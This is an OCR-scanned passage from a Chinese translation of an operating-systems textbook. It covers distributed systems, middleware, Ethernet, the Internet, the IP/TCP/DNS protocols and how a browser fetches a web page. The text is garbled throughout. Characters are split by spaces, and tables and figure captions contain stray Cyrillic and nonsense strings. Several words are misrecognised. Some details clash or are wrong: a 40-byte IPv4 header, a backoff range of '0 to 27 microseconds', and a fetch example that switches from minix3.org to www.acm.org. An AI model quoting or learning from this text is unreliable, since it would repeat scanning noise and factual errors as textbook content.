模 等 工作 的 512 个 节点 ， 而 一 个 典型 的 分 布 式 系统 包括 了 通过 Internet 松 散 协作 的 上 千 台 机 器 。 在 图 8-29 
中 ， 对 多 处 理 机 、 多 计算 机 和 分 布 式 系统 就 上 述 各 点 进行 了 比较 。 


多 处 理 机 | 多 计算 机 分 布 式 系统 
CPU CPU、RAM、 网 络 接口 | 完整 的 计算 机 ”一 
E 全 部 共享 | 共享 exe.、 可 能 除了 磁盘 | 每 个 节点 全 套 外 设 
К __|й-ия ”| 同一 房间 | 可 能 全 球 
节点 问 通 信 共享 RAM _ 专 用 互 连 o | pamm | 
操作 系统 __ 一 个 , 共享 | 多 个 ,相同 |_ 可 能 都 不 相同 _ 
| 文件 系统 | 一 个 , 共享 | 一 个 , 共享 每 个 节点 自 有 
| т К | 一 个 机 构 | 一 个 机 构 多 个 机 构 


图 8-29 三 类 多 CPU 系统 的 比较 


通过 这 个 表 可 以 清楚 地 看 到 ， 多 计算 机 处 于 中 间 位 置 。 于 是 一 个 有 趣 的 问题 就 是 ; “多 计算 机 是 更 
像 多 处 理 机 还 是 更 像 分 布 式 系统 ? ”很 奇怪 ， 答 案 取决 于 你 的 角度 。 从 技术 角度 来 看 ， 多 处 理 机 有 共享 
存储 器 而 其 他 两 类 没有 。 这 个 差别 导致 了 不 同 的 程序 设计 模式 和 不 同 的 思考 方式 。 但 是 ， 从 应 用 角度 来 
看 ， 多 处 理 机 和 多 计算 机 都 不 过 是 在 机 房 中 的 大 设备 机 架 (rack) 罢了 ， 而 在 全 部 依靠 Internet 连 接 计 算 
机 的 分 布 式 系统 中 显然 通信 要 多 于 计算 ， 并 且 以 不 同 的 方式 使 用 着 。 

在 某 种 程度 上 ， 分 布 式 系统 中 计算 机 的 松散 耦合 既是 优点 又 是 缺点 。 它 之 所 以 是 优点 ， 是 因为 这 些 
计算 机 可 用 在 各 种 类 型 的 应 用 之 中 ， 但 它 也 是 缺点 ， 因 为 它 由 于 缺少 共同 的 底层 模型 而 使 得 这 些 应 用 程 
序 很 难 编程 实现 。 

典型 的 Internet 应 用 有 远程 计算 机 访问 (使 用 telnet、ssh 和 rlogin)、 远 程 信息 访问 (使 用 万 维 网 
(World Wide Web) 和 FTP， 即 文件 传输 协议 )、 人 际 通信 (使 用 e-mail 和 聊天 程序 ) 以 及 正在 浮现 的 许 
多 应 用 (例如 ， 电 子 商 务 、 远 程 医疗 以 及 远程 教育 等 )。 所 有 这 些 应 用 带 来 的 问题 是 ， 每 个 应 用 都 得 重 
新 开发 。 例 如 ，e-mail 、FTP 和 万 维 网 基本 上 都 是 将 文件 从 A 点 移动 到 另 一 个 点 B， 但 是 每 一 种 应 用 都 有 
自己 的 方式 从 事 这 项 工作 ， 完 全 按照 自己 的 命名 规则 、 传 输 协议 、 复 制 技术 以 及 其 他 等 。 尽 管 许 多 Web 
浏览 器 对 普通 用 户 隐藏 了 这 些 差别 ， 但 是 底层 机 制 仍然 是 完全 不 同 的 。 在 用 户 界面 级 隐藏 这 些 差别 就 像 
有 一 个 人 在 一 家 提供 全 面 服务 的 旅行 社 的 Web 站 点 中 预订 了 从 纽约 到 旧金山 的 旅行 ， 后 来 发 现 她 所 购买 
的 只 不 过 是 一 张 飞 机 票 、 一 张 火车 票 或 者 一 张 汽车 票 而 已 。 

分 布 式 系统 添加 在 其 底层 网 络 上 的 是 一 些 通用 范 型 (模型 ) ， 它 们 提供 了 一 种 统一 的 方法 来 观察 束 
个 系统 。 分 布 式 系统 想 要 做 的 是 ， 将 松散 连接 的 大 量 宙 器 转化 为 基于 一 种 概念 的 一 致 系统 。 这 些 范 型 有 
的 比较 简单 ， 而 有 的 是 很 复杂 的 ， 但 是 其 思想 则 总 是 提供 某 些 东西 用 来 统一 整个 系统 。 

在 上 下 文 稍 有 差别 的 情形 下 ， 统 一 范例 的 一 个 简单 例子 可 以 在 UNIX 中 找到 。 在 UNIX 中 ， 所 有 的 
IO 设备 被 构造 成 像 文件 一 样 。 对 键盘 、 打 印 机 以 及 串 行 通信 线 等 都 使 用 相同 的 方式 和 相同 的 原 语 进行 
操作 ， 这 样 ， 与 保持 原 有 概念 上 的 差异 相 比 ， 对 它们 的 处 理 更 为 容易 。 

分 布 式 系统 面 对 不 同 硬件 和 操作 系统 实现 某 种 统一 性 的 途径 是 ， 在 操作 系统 的 顶部 添加 一 层 软件 。 
这 层 软件 称 为 中 间 件 (middleware) ， 如 图 8-30 所 示 。 这 层 软件 提供 了 一 些 特定 的 数据 结构 和 操作 ， 从 而 
无 许 散 布 的 机 器 上 的 进程 和 用 户 用 一 致 的 方式 互 操作 。 
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应 用 的 公共 基础 
应 用 应 用 应 用 应 用 
中 间 件 中 间 件 中 间 件 中 间 件 
Windows Linux Solaris Мас OS | 


Pentium Pentium | SPARC Macintosh | 
网 络 


图 8-30 在 分 布 式 系统 中 中 间 件 的 地 位 


在 某 种 意义 上 ， 中 间 件 像 是 分 布 式 系统 的 操作 系统 。 这 就 是 为 什么 在 一 本 关于 操作 系统 的 书 中 讨论 
中 间 件 的 原因 。 不 过 另 一 方面 ， 中 间 件 又 不 是 真正 的 操作 系统 ， 所 以 我 们 对 中 间 件 有 关 的 讨论 不 会 过 于 
详细 。 较 为 全 面 的 关于 分 布 式 系统 的 讨论 可 参见 《分 布 式 系统 》(Distributed Systems, Tanenbaum 和 
van Steen，2006)。 在 本 章 余下 的 部 分 ， 首 先 我 们 将 快速 考察 在 分 布 式 系统 (下 层 的 计算 机 网 络 ) 中 使 
用 的 硬件 ， 然 后 是 其 通信 软件 〈 网 络 协议 )。 接 着 我 们 将 考虑 在 这 些 系统 中 的 各 种 范 型 。 


8.4.1 网 络 硬件 

分 布 式 系统 构建 在 计算 机 网 络 的 上 层 ， 所 以 有 必要 对 计算 机 网 络 这 个 主题 做 个 简要 的 介绍 。 网 络 主 
要 有 两 种 ， 覆 盖 一 座 建筑 物 或 一 个 校园 的 LAN (局 域 网 ，Local Area Networks) 和 可 用 于 城市 、 乡 村 其 
至 世界 范围 的 WAN (广域网 ，Wide Area Network)。 最 重要 的 LAN 类 型 是 以 太 网 (Ethernet) ， 所 以 我 们 
把 它 作 为 LAN 的 范例 来 考察 。 至 于 WAN 的 例子 ， 我 们 将 考察 Internet， 尽 管 在 技术 上 Internet 不 是 一 个 网 
络 ， 而 是 上 千 个 分 离 网 络 的 联邦 。 但 是 ， 就 我 们 的 目标 而 言 ， 把 Internet 视 为 一 个 WAN 就 足够 了 。 

1. AKA (Ethernet) 

经 典 的 以 太 网 ， 在 IEEE802.3 标 准 中 有 具体 描述 ， 由 用 来 连接 若干 计算 机 的 同 轴 电 缆 组 成 。 这 些 电 
缆 之 所 以 称 为 以 太 网 (Ethernet) ， 是 源 于 发 光 以 太 ， 人 们 曾经 认为 电磁 辐射 是 通过 以 太 传播 的 。(19 世 
纪 英 国 物理 学 家 James Clerk Maxwell 发 现 了 电磁 辐射 可 用 一 个 波动 方程 描述 ， 那 时 科学 家 们 假设 空中 必 
须 充满 了 某 些 以 太 介质 ， 而 电磁 辐射 则 在 该 以 太 介质 中 传播 。 不 过 在 1887 年 著名 的 Michelson-Morley 实 
验 中 ， 科 学 家 们 并 未 能 探测 到 以 太 的 存在 ， 在 这 之 后 物理 学 家 们 才 意识 到 电磁 辐射 可 以 在 真空 中 传播 ) 。 

在 以 太 网 的 非常 早 的 第 一 个 版 本 中 ， 计算 机 与 钻 了 半截 孔 的 电缆 通过 一 端 固定 在 这 些 孔 中 而 另 一 端 
与 计算 机 连接 的 电线 相连 接 。 它 们 被 称 为 插入 式 分 接头 (vampire tap)， 如 图 8-31a 中 所 示 。 可 是 这 种 接 
头 很 难 接 正确 ， 所 以 没 过 多 久 ， 就 换 用 更 合适 的 接头 了 。 无 论 怎样 ， 从 电气 上 来 看 ， 所 有 的 计算 机 都 被 
连接 起 来 ， 在 网 络 接口 卡 上 的 电缆 仿佛 是 被 焊 上 一 样 。 

要 在 以 太 网 上 发 送 包 ,计算 机 首先 要 侦 听 电缆 ， 看 看 是 否 有 其 他 的 计算 机 正在 进行 传输 。 如 果 没 有 ， 
这 人 台 计算 机 便 开 始 传送 一 个 包 ， 其 中 有 一 个 短 包 头 ， 随 后 是 0 到 1500 字 节 的 有 效 信息 载荷 (payload), 
如 果 电缆 正在 使 用 中 ， 计 算 机 只 是 等 待 直 到 当前 的 传输 结束 ， 接着 该 台 计 算 机 开始 发 送 。 

如 果 两 台 计算 机 同时 开始 发 送 ， 就 会 导致 冲突 发 生 ， 两 台 机 器 都 做 检测 。 两 机 都 用 中 断 其 传输 来 响 
应 检测 到 的 碰撞 ， 然 后 在 等 待 一 个 从 0 到 7 微 秒 的 随机 时 间 段 之 后 ， 再 重新 开始 。 如 果 再 一 次 冲突 发 生 ， 
所 有 碰撞 的 计算 机 进入 0 到 27 微 秒 的 随机 等 待 。 然 后 再 尝试 。 在 每 个 后 续 的 冲突 中 ， 最 大 等 待 间隔 加 倍 ， 
用 以 减少 更 多 碰撞 的 机 会 。 这 个 算法 称 为 二 进 制 指数 补偿 算法 (binary exponential backoff), 在 前 面 有 
关 减 少 锁 的 轮 询 开销 中 ， 我 们 曾 介 绍 过 这 种 算法 。 

以 太 网 有 其 最 大 电缆 长 度 限制 ， 以 及 可 连接 的 最 多 的 计算 机 台数 限制 。 要 想 超过 其 中 一 个 的 限制 ， 
就 要 在 一 座 大 建筑 物 或 校园 中 连接 多 个 以 太 网 ， 然 后 用 一 种 称 为 桥接 器 (bridge) 的 设备 把 这 些 以 太 网 
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连接 起 来 。 桥 接 器 允许 信息 从 一 个 以 太 网 传递 到 另 一 个 以 太 网 ， 而 源 在 桥接 器 的 一 边 ， 目 的 地 在 桥接 器 
的 另 一边 。 


计算 机 
hs 


计算 机 
М 


以 太 网 
а) b) 


图 8-31 a) 经 典 以 太 网 ，b) 交换 式 以 太 网 


为 了 避免 碰撞 问题 ， 现 代 以 太 网 使 用 交换 机 (switch) ， 如 图 8-31b 所 示 。 每 个 交换 机 有 若干 个 端口 ， 
一 个 端口 用 于 连接 一 台 计算 机 、 一 个 以 太 网 或 另 一 个 交换 机 。 当 一 个 包 成 功 地 避 开 所 有 的 碰撞 并 到 达 交 
换 机 时 ， 它 被 缓存 在 交换 机 中 并 送 往 另 一 个 通 往 目的 地 机 器 的 端口 。 若 能 忍受 较 大 的 交换 机 成 本 ， 可 以 
使 每 台 机 器 都 拥有 自己 的 端口 ， 从 而 消除 掉 所 有 的 碰撞 。 作 为 一 种 妥协 方案 ， 在 每 个 端口 上 连接 少量 的 
计算 机 还 是 有 可 能 的 。 在 图 8-3lb 中 ， 一 个 经 典 的 由 多 个 计算 机 组 成 以 太 网 连接 到 交换 机 的 一 个 端口 中 ， 
这 个 以 太 网 中 的 计算 机 通过 插入 式 分 接头 连接 在 电缆 上 。 

2. 因特网 

Internet 由 ARPANET (美国 国防 部 高 级 研究 项 目 署 资助 的 一 个 实验 性 的 分 组 交换 网 络 ) 演化 而 来 。 
它 自 1969 年 12 月 起 开始 运行 ， 由 三 台 在 加 州 的 计算 机 和 一 台 在 犹他 州 的 计算 机 组 成 。 当 时 正 值 冷战 的 顶 
峰 时 期 ， 它 被 设计 为 一 个 高 度 容错 的 网 络 ， 在 核弹 直接 击 中 网 络 的 多 个 部 分 时 ， 该 网 络 将 能 够 通过 自动 
改换 已 死亡 机 器 周边 的 路 由 ， 继 续 保持 军事 通信 的 中 继 。 

ARPANET 在 20 世 纪 70 年 代 迅 速 地 成 长 ， 结 果 拥 有 了 上 百 台 计算 机 。 接 着 ， 一 个 分 组 无 线 网 络 、 一 个 
卫星 网 络 以 及 成 千 的 以 太 网 都 联 在 了 该 网 络 上 ， 从 而 变 成 为 网 络 的 联邦 ， 即 我 们 今天 所 看 到 的 Intemnet。 

Internet 包 括 了 两 类 计算 机 ， 主 机 和 路 由 器 。 主 机 (host) 有 PC 机 、 笔 记 本 计算 机 、 掌 上 电脑 ， 服 
务 器 、 大 型 计算 机 以 及 其 他 那些 个 人 或 公司 所 有 且 希 望 与 Internet 连 接 的 计算 机 。 路 由 器 (router) 是 专 
用 的 交换 计算 机 ， 它 在 许多 进 线 中 的 一 条 线 上 接收 进来 的 包 ， 并 在 许多 个 出 口 线 中 的 一 条 线 上 按照 其 路 
径 发 送 包 。 路 由 器 类 似 于 图 8-31b 中 的 交换 机 ， 但 是 路 由 器 与 这 种 交换 机 也 是 有 差别 的 ， 这 些 差 别 就 不 
在 这 里 讨论 了 。 在 大 型 网 络 中 ， 路 由 器 互相 连接 ， 每 台 路 由 器 都 通过 线 缆 或 光缆 连接 到 其 他 的 路 由 器 或 
主机 上 。 电 话 公司 和 互联 网 服务 提供 商 (Internet Service Providers, ISP) 为 其 客户 运行 大 型 的 全 国 性 
或 全 球 性 路 由 器 网 络 。 

图 8-32 展 示 了 Intemet 的 一 部 分 。 在 图 的 顶部 是 其 主干 网 (backbone) 之 一 ， 通 常 由 主干 网 操作 员 管 
理 。 它 包括 了 大 量 通过 宽带 光纤 连接 的 路 由 器 ， 同 时 连接 着 其 他 (竞争 ) 电话 公司 运行 管理 的 主干 网 。 
除了 电话 公司 为 维护 和 测试 所 需 运行 的 机 器 之 外 ， 通 常 没 有 主机 直接 联 在 主干 网 上 。 

地 区 网 络 和 ISP 的 路 由 器 通过 中 等 速度 的 光纤 连接 到 主干 网 上 。 依 次 ， 每 个 配备 路 由 器 的 公司 以 太 
网 连接 到 地 区 网 络 的 路 由 器 上 。 而 ISP 的 路 由 器 则 被 连接 到 供 ISP 客 户 们 使 用 的 调制 解 调 器 汇集 器 (bank) 
上 。 按 照 这 种 方式 ， 在 Internet 上 的 每 台 主机 至 少 拥有 通 往 其 他 主机 的 一 条 路 径 ， 而 且 每 台 经 常 拥有 多 条 
通 往 其 他 主机 的 路 径 。 

在 Internet 上 的 所 有 通信 都 以 包 (packet) 的 形式 传送 。 每 个 包 在 其 内 部 携带 着 目的 地 的 地 址 ， 而 这 
个 地 址 是 供 路 由 器 使 用 的 。 当 一 个 包 来 到 某 个 路 由 器 时 ， 该 路 由 器 抽取 目的 地 地 址 并 在 一 个 表格 (部分) 
中 进行 查询 ， 以 找 出 用 哪 根 出 口 线 发 送 该 包 以 及 发 送 到 哪个 路 由 器 。 这 个 过 程 不 断 重复 ， 直 到 这 个 包 到 
达 目 的 主机 。 路 由 表 是 高 度 动态 的 ， 并 且 随 着 路 由 器 和 链 路 的 损坏 、 恢 复 以 及 通信 条 件 的 变化 在 连续 不 
断 地 更 新 。 
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图 8-32 Intemet 的 一 部 分 


8.4.2 网 络 服务 和 协议 

所 有 的 计算 机 网 络 都 为 其 用 户 〈 主 机 和 进程 ) 提供 一 定 的 服务 ， 这 种 服务 通过 某 些 关于 合法 消息 交 
换 的 规则 加 以 实现 。 下 面 将 简要 地 叙述 这 些 内 容 。 

1. 网 络 服务 

计算 机 网 络 为 使 用 网 络 的 主机 和 进程 提供 服务 。 面向 连接 的 服务 是 对 电话 系统 的 一 种 模仿 。 比 如 ， 
车 要 同 某 人 谈话 ， 则 要 先 拿 起 听 简 ， 拨 出 号 码 ， 说 话 ， 然 后 挂 掉 。 类 似 地 ， 要 使 用 面向 连接 的 服务 ， 服 
务 用 户 要 先 建立 一 个 连接 ， 使 用 该 连接 ， 然 后 释放 该 连接 。 一 个 连接 的 基本 作用 则 像 一 根 管道 ;发送 者 
在 一 端 把 物品 (信息 位 ) 推 人 管道 ， 而 接收 者 则 按照 相同 的 顺序 在 管道 的 另 一 端 取出 它们 。 

相反 ， 无 连接 服务 则 是 对 邮政 系统 的 一 种 模仿 。 每 个 消息 (信件 ) 携带 了 完整 的 目的 地 地 址 ， 与 所 
有 其 他 消息 相 独 立 ， 每 个 消息 有 自己 的 路 径 通过 系统 。 通 常 ， 当 两 个 消息 被 送 往 同 一 个 目的 地 时 ， 第 一 
个 发 送 的 消息 会 首先 到 达 。 但 是 ， 有 可 能 第 一 个 发 送 的 消息 会 被 延误 ， 这 样 第 二 个 消息 会 首先 到 达 。 而 
对 于 面向 连接 的 服务 而 言 ， 这 是 不 可 能 发 生 的 。 

每 种 服务 可 以 用 服务 质量 (quality of service) 表征 。 有 些 服 务 就 其 从 来 不 丢失 数据 而 言 是 可 靠 的 。 
一 般 来 说 ， 可 靠 的 服务 是 用 以 下 方式 实现 的 : 接收 者 发 回 一 个 特别 的 确认 包 (acknowledgement packet) , 
确认 每 个 收 到 的 消息 ， 这 样 发 送 者 就 确信 消息 到 达 了 。 不 过 确认 的 过 程 引 入 了 过 载 和 延迟 的 问题 ， 检 查 
包 的 丢失 是 必要 的 ， 但 是 这 样 确实 减缓 了 传送 的 速度 。 

一 种 适合 可 靠 的 、 面 向 连接 服务 的 典型 场景 是 文件 传送 。 文件 的 所 有 者 希望 确保 所 有 的 信息 位 都 是 
正确 的 ， 并 且 按 照 以 其 所 发 送 的 顺序 到 达 。 几乎 没有 哪个 文件 发 送 客户 会 愿意 接受 偶尔 会 弄 乱 或 丢失 一 
些 位 的 文件 传送 服务 ， 即 使 其 发 送 速度 更 快 。 

可 靠 的 、 面 向 连接 的 服务 有 了 两 种 轻微 变种 (minor variant) ， 消 息 序 列 和 字 节 流 。 在 前 者 的 服务 中 ， 
保留 着 消息 的 边界 。 当 两 个 IKB 的 消息 发 送 时 ， 它们 以 两 个 有 区 别 的 1KB 的 消息 形式 到 达 ， 决 不 会 成 为 
一 个 2KB 的 消息 。 在 后 者 的 服务 中 ， 连 接 只 是 形成 为 一 个 字 节 流 ， 不 存在 消息 的 边界 。 当 2K 字 节 到 达 接 
收 者 时 ， 没 有 办 法 分 辨 出 所 发 送 的 是 一 个 2KB 消 息 、 两 个 IKB 消 息 还 是 2048 个 单字 节 的 消息 。 如 果 以 分 
离 的 消息 形式 通过 网 络 把 一 本 书 的 页 面 发 送 到 一 台 照 排 机 上 ， 在 这 种 情形 下 也 许 保留 消息 的 边界 是 重要 
的 。 而 另 一 方面 ， 在 通过 一 个 终端 登录 进入 某 个 远程 分 时 系统 时 ， 所 需要 的 也 只 是 从 该 终端 到 计算 机 的 
字 节 流 。 

对 某 些 应 用 而 言 ， 由 确认 所 引入 的 时 延 是 不 可 接受 的 。 一 种 这 样 的 应 用 例子 是 数字 化 的 语音 通信 。 
对 电话 用 户 而 言 ， 他 们 宁可 时 而 听 到 一 点 噪音 或 一 个 被 焉 曲 的 词 ， 也 不 会 愿意 为 了 确认 而 接受 时 延 。 
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并 不 是 所 有 的 应 用 都 需要 连接 。 例 如 ， 在 测试 网 络 时 ， 所 需要 的 只 是 一 种 发 送 单个 包 的 方法 ， 其 中 
的 这 个 包 具备 有 高 可 达到 率 但 不 保证 一 定 可 达 。 不 可 靠 的 (意味 着 没有 确认 ) 无 连接 服务 ， 常 常 称 作 数 
据 报 服务 (datagram service) ， 它 模拟 了 电报 服务 ， 这 种 服务 也 不 为 发 送 者 提供 回 送 确认 的 服务 。 

在 其 他 的 情形 下 ， 不 用 建立 连接 就 可 发 送 短 消息 的 便利 是 受到 欢迎 的 ， 但 是 可 靠 性 仍然 是 重要 的 。 
可 以 把 确认 数据 报 服务 (acknowledged datagram service) 提供 给 这 些 应 用 使 用 。 它 类 似 于 寄 送 一 封 挂号 
信 并 且 要 求 得 到 一 个 返回 收据 。 当 收据 回 送 到 之 后 ， 发 送 者 就 可 以 绝对 确信 ， 该 信 已 被 送 到 所 希望 的 地 
方 且 没 有 在 路 上 丢失 。 

还 有 一 种 服务 是 请 求 一 应 答 服务 (request-reply service) 。 在 这 种 服务 中 ， 发 送 者 传送 一 份 包含 一 个 


请 求 的 数据 报 ， 应 答 中 含有 答复 。 例 如 ， 发 | Ее ЖЫ 
给 本 地 图 书馆 的 一 份 询问 维吾尔 语 在 什么 地 TT TANPA 
方 被 使 用 的 请 求 就 属于 这 种 类 型 。 在 客户 шы) Hiere 国医 下 
E 采用 请 EE 
机 一 服务 器 模式 的 通信 实现 中 常常 采用 请 БЕГЕТ ГЕШ 
求 -应 答 : 客户 机 发 出 一 个 请 求 ， 而 服务 器 不 可 靠 数据 报 网 络 测试 数据 包 
则 响应 该 请 求 。 图 8-33 总 结 了 上 面 讨论 过 的 àd 确认 数据 报 注册 邮件 
各 种 服务 类 型 。 请 求 -应 答 数据 库 查询 
2. 网 络 协议 


所 有 网 络 都 有 高 度 专门 化 的 规则 ， 用 以 国 3 НН АШЫНА, 

说 明 什 么 消息 可 以 发 送 以 及 如 何 响应 这 些 消息 。 例 如 ， 在 菜 些 条 件 下 (如 文件 传送 )， 当 一 条 消息 从 源 送 
到 目的 地 时 ， 目 的 地 被 要 求 返回 一 个 确认 ， 以 表示 正确 收 到 了 该 消息 。 在 其 他 情形 下 (如 数字 电话 )， 就 
不 要 求 这 样 的 确认 。 用 于 特定 计算 机 通信 的 这 些 规则 的 集合 ， 称 为 协议 protocol)。 有 许多 种 协议 ” 包 
括 路 由 器 -路 由 器 协议 、 主 机 -主机 协议 以 及 其 他 协议 等 。 要 了 解 计算 机 网 络 及 其 协议 的 完整 论述 ， 可 参 
阅 《 计 算 机 网 络 》(Computer Networks, Tanenbaum, 2003), 

所 有 的 现代 网 络 都 使 用 所 请 的 协议 栈 《protocol маск) 把 不 同 的 协议 一 层 一 层 委 加 起 来 。 每 一 肢解 
决 不 同 的 问题 。 例 如 ， 处 于 最 低层 的 协议 会 定义 如 何 识别 比特 流 中 的 数据 包 的 起 始 和 结束 位 置 。 在 更 高 
一 层 上 ， 协 议会 确定 如 何 通过 复杂 的 网 络 来 把 数据 包 从 来 源 节点 发 送 到 目标 节点 。 再 高 一 层 上 、 协 议会 
确保 多 包 消息 中 的 所 有 数据 包 都 按照 合适 的 顺序 正确 到 达 。 

大 多 数 分 布 式 系统 都 使 用 Internet 作 为 基础 ， 因 此 这 些 系统 使 用 的 关键 协议 是 两 种 主要 的 Internet 协 
iX: IP 和 TCP。IP (Internet Protocol) 是 一 种 数据 报 协议 ， 发 送 者 可 以 向 网 络 上 发 出 长 达 64KB 的 数据 报 
并 期 望 它 能 够 到 达 。 它 并 不 提供 任何 保证 。 当 数据 报 在 网 络 上 传送 时 ， 它 可 能 被 切 制 成 更 小 的 包 。 这 些 
包 独 立 进行 传输 ， 并 可 能 通过 不 同 的 路 由 。 当 所 有 的 部 分 都 到 达 目的 地 时 ， 再 把 它们 按照 正确 的 顺序 装 
配 起 来 并 提交 出 去 。 

当前 有 两 个 版 本 的 IP 在 使 用 ， 即 v4 和 v6。 当 前 v4 仍然 占有 支配 地 位 ， 所 以 我 们 这 里 主要 讨论 它 ， 但 
是 ，v6 是 未 来 的 发 展 方向 。 每 个 v4 包 以 一 个 40 字 节 的 包头 开始 ， 其 中 包含 32 位 源 地 址 和 32 位 目标 地 址 。 
这 些 地 址 就 称 为 IP 地 址 ， 它 们 构成 了 Internet 中 路 由 选择 的 基础 。 通 常 IP 地 址 写作 4 个 由 点 隔 开 的 十 进 制 
数 ， 每 个 数 介 于 0~255 之 间 ， 例 如 192.31.231.65。 当 一 个 包 到 达 路 由 器 时 ， 路 由 器 会 解析 出 IP 目 标 地 址 ， 
并 利用 该 地 址 选择 路 由 。 

既然 JP 数据 报 是 非 应 答 的 ， 所 以 对 于 Internet 的 可 靠 通信 仅仅 使 用 IP 是 不 够 的 。 为 了 提供 可 靠 的 通信 
通常 在 IP 层 之 上 使 用 另 一 种 协议 ，TCP (Transmission Control Protocol， 传 输 控制 协议 )。 TCP 使 用 IP 来 
提供 面向 连接 的 数据 流 。 为 了 使 用 TCP， 进 程 需要 首先 与 一 个 远程 进程 建立 连接 。 被 请 求 的 进程 需要 通 
过 机 器 的 IP 地 址 和 机 器 的 端口 号 来 指定 ， 而 对 进入 的 连接 感 兴趣 的 进程 监听 该 端口 。 这 些 工作 完成 之 后 
只 需 把 字 节 流放 入 连接 ， 那 么 就 能 保证 它们 会 从 另 一 端 按照 正确 的 顺序 完好 无 损 地 出 来 。TCP 的 实现 是 
通过 序列 号 、 校 检 和 、 出 错 重 传 来 提供 这 种 保证 的 。 所 有 这 些 对 于 发 送 者 和 接收 者 进程 都 是 透明 的 。 它 
们 看 到 的 只 是 可 靠 的 进程 间 通 信 ， 就 像 UNIX 管 道 一 样 。 

为 了 了 解 这 些 协议 的 交互 过 程 ， 我 们 来 考虑 一 种 最 简单 的 情况 。 要 发 送 的 消息 很 小 ， 在 任何 _ 层 都 
不 需要 分 割 它 。 主 机 处 于 一 个 连接 到 Internet 上 的 Ethernet 中 。 那 么 究竟 发 生 了 什么 呢 ? 首先， 用户 进程 
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产生 消息 ， 并 在 一 个 事先 建立 好 的 TCP 连 接 上 通过 系统 调用 来 发 送 消息 。 内 核 协议 栈 依次 在 消息 前 面 添 
加 TCP 包 头 和 IP 包 头 。 然 后 由 Ethernet 驱 动 再 添加 一 个 Ethernet 包 头 ， 并 把 该 数据 包 发 送 到 Ethernet 的 路 由 
器 上 。 如 图 8-34 路 由 器 把 数据 包 发 送 到 Internet 上 。 


图 8-34 数据 包头 的 累加 过 程 


为 了 与 远程 机 器 建立 连接 (或 者 仅仅 是 给 它 发 送 一 个 数据 包 ) ， 需要 知道 它 的 IP 地 址 。 因 为 对 于 人 
们 来 说 管理 32 位 的 IP 地 址 列表 是 很 不 方便 的 ， 所 以 就 产生 了 一 种 称 为 DNS (Domain Мате System， 域 名 
系统 ) 的 方案 ， 它 作为 一 个 数据 库 把 主机 的 ASCI[ 名 称 映射 为 对 应 的 IP 地 址 。 因此 就 可 以 用 DNS 名 称 
(如 starcs'vunl) 来 代替 对 应 的 IP 地 址 ) (如 130.37.24.6)。 由 于 Internet 电 子 邮件 地 址 采用 “用 户 名 
@DNS 主 机 名 ”的 形式 命名 ， 所 以 DNS 名 称 广为人知 。 该 命名 系统 允许 发 送 方 机 器 上 的 邮件 程序 在 DNS 
数据 库 中 查找 目标 机 器 的 IP 地 址 ， 并 与 目标 机 上 的 邮件 守护 进程 建立 TCP 连 接 ， 然后 把 邮件 作为 文件 发 
送出 去 。 用 户 名 一 并 发 送 ， 用 于 确定 存放 消息 的 邮箱 。 


8.4.3 基于 文档 的 中 间 件 

现在 我 们 已 经 有 了 一 些 有 关 网 络 和 协议 的 背景 知识 ， 可 以 开始 讨论 不 同 的 中 间 件 层 了 。 这 些 中 间 件 
层 位 于 基础 网 络 上 ， 为 应 用 程序 和 用 户 提供 一 致 的 范 型 。 我 们 将 从 一 个 简单 但 是 却 非常 著名 的 例子 开始 ， 
万 维 网 (World Wide Web) 。 Web 是 由 在 欧洲 核子 中 心 (CERN) 工作 的 Tim Berners-Lee 于 1989 年 发 明 的 ， 
从 那 以 后 Web 就 像 野 火 一 样 传 遍 了 全 世界 。 

Web 背 后 的 原始 范 型 是 非常 简单 的 ,每 个 计算 机 可 以 持 有 一 个 或 多 个 文档 ， 称 为 Web 页 面 (Web 
page)。 在 每 个 页 面 中 有 文本 、 图 像 、 图 标 、 声 音 、 电 影 等 ， 还 有 到 其 他 页 面 的 起 链接 (hyperlink) ( 指 
针 )。 当 用 户 使 用 一 个 称 为 Web 浏 览 器 (Web browser) 的 程序 请 求 一 个 Web 页 面 时 ， 该 页 面 就 显示 在 用 
户 的 屏幕 上 。 点 击 一 个 超 链接 会 使 得 屏幕 上 的 当前 页 面 被 所 指向 的 页 面 替代 。 尽管 近来 在 Web 上 添加 了 
许多 的 花哨 名 堂 ， 但 是 其 底层 的 范 型 仍旧 很 清楚 地 存在 着 : Web 是 一 个 由 文档 构成 的 巨大 有 向 图 ， 其 中 


文档 可 以 指向 其 他 的 文档 ， 如 图 8-35 所 示 。 


图 8-35 Web 是 一 个 由 文档 构成 的 大 有 向 图 
每 个 Web 页 面 都 有 一 个 惟一 的 地 址 ， 称 为 URL (统一 资源 定位 符 ，Uniform Resource Locator), 其 
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形式 为 protocol://DNS-name/file-name。http 协 议 ( 超 文本 传输 协议 ，HyperText Transfer Protocol) 是 最 
常用 的 ， 不 过 ftp 和 其 他 协议 也 在 使 用 。 协 议 名 后 面 是 拥有 该 文件 的 主机 的 DNS 名 称 。 最 后 是 一 个 本 地 文 
件 名 ， 用 来 说 明 需 要 使 用 哪个 文件 。 

整个 系统 按 如 下 方式 结合 在 一 起 :Web 根 本 上 是 一 个 客户 机 -服务 器 系统 ， 用 户 是 客户 端 ， 而 Web 站 
点 则 是 服务 器 。 当 用 户 给 浏览 器 提供 一 个 URL 时 (或 者 键入 URL， 或 者 点 击 当前 页 面 上 的 某 个 超 链接 )， 
浏览 器 则 按照 一 定 的 步 又 调 取 所 请 求 的 Web 页 面 。 作 为 一 个 例子 ， 假 设 提供 的 URL 是 http://www. 
minix3, org/doc/faq.html。 浏 览 器 按照 下 面 的 步骤 取得 所 需 的 页 面 。 

D 浏览 器 向 DNS 询问 www.minix3.org 的 IP 地 址 。 

2) DNS 回答 ， 是 130.37.20.20。 

3) 浏览 器 建立 一 个 到 130.37.20.20 上 端口 80 的 TCP 连 接 。 

4) 接着 浏览 器 发 送 对 文件 doc/faq.htmli 的 请 求 。 

5) www.acm.org 服 务 器 发 送 文件 doc/faq.html。 

6) 释放 TCP 连 接 。 

7) 浏览 器 显示 doc/faq.html 文 件 中 的 所 有 文本 。 

8) 浏览 器 获取 并 显示 doc/faq.htmi 中 的 所 有 图 像 。 

大 体 上 ， 这 就 是 Web 的 基础 以 及 它 是 如 何 工作 的 。 许 多 其 他 的 功能 已 经 添加 在 了 上 述 基本 Web 功 能 
之 上 了 ,包括 样式 表 、 可 以 在 运行 中 生成 的 动态 网 页 、 带 有 可 在 客户 机 上 执行 的 小 程序 或 脚本 的 页 面 等 ， 
不 过 对 它们 的 讨论 超出 了 本 书 的 范围 。 

8.4.4 基于 文件 系统 的 中 间 件 

